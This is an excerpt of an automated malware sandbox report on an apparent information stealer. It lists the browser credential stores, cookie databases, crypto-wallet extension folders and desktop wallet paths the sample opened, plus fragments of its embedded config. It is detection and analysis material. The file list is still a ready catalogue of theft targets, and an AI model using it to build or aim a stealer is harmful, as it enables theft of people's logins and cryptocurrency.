                      Source: Yara match File source: 00000036.00000002.1990082511.0000000000EC1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: bb5ad48269.exe PID: 5724, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: bb5ad48269.exe PID: 6960, type: MEMORYSTR
                      Source: 19be97887a.exe, 0000001E.00000003.2004127745.0000000000D50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: allets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\walle
                      Source: 19be97887a.exe, 0000001E.00000003.2004127745.0000000000D50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":y
                      Source: 19be97887a.exe, 0000001E.00000003.1888188996.0000000000D54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: enllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmxb
                      Source: 19be97887a.exe, 0000001E.00000003.2005526460.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                      Source: 19be97887a.exe, 0000001E.00000003.1861959536.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: 19be97887a.exe, 0000001E.00000003.1832303187.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
                      Source: 19be97887a.exe, 0000001E.00000003.1832789599.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
                      Source: 19be97887a.exe, 00000023.00000002.2114874783.0000000000D80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: powershell.exe, 0000000C.00000002.985320778.00007FF9367B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: c6e8248d4e.exeBinary or memory string: WIN_81
                      Source: c6e8248d4e.exeBinary or memory string: WIN_XP
                      Source: c6e8248d4e.exe, 00000022.00000002.2110937860.00000000009C2000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please 